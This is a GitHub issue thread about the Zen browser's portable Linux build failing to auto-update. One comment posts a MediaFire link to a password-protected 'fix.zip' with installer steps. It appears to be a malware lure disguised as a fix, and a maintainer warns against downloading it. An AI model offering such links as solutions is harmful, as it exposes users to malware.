### ISSUE TITLE
Auto Update does not work on portable version

### ISSUE THREAD

**Issue by Korygauger** [zen-browser/desktop#1030]
### What happened?

To start off this could very well be my fault but trying to fix it has been taxing.

I first tried to install this browser via the AppImage but the AppImage refused to integrate using AppImage launcher, then trying to just install it my self led to rofi not being able to launch it for some unknown reason. Putting it in the path didn't help and my .desktop file pointed directly to the AppImage so I have no idea why it wouldn't launch.

Then I decided to install the portable version and I installed it to /usr/share where I have installed similar applications. The app now refuses to update, so now when you guys come out with your daily update, I have to manually download the tar then unpack it to /usr/share which is annoying but not a deal breaker. I thought it was a privilege problem and tried installing it in a new location (and changing the location of the binary in my .desktop file) but I can't seem to verify if that works because rofi refuses to launch it in a another location and I have no idea why. If this is my fault then please tell me I am pulling my hair out trying to fix this.

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.32

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

### Relevant log output

```shell
Don't know where the logs are but the updater has the buidID: 1b5b91abbc0889ca675884a924c05791d6314c59
if that helps
```

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Korygauger** [comment]
I figured are you guys having a bot problem?

**Comment by Korygauger** [comment]
he commented way to fast for it to be a fix

**Comment by Korygauger** [comment]
Don't worry I didn't think you were

**Comment by mauro-balades** [comment]
do not download any links, even the ones from myself
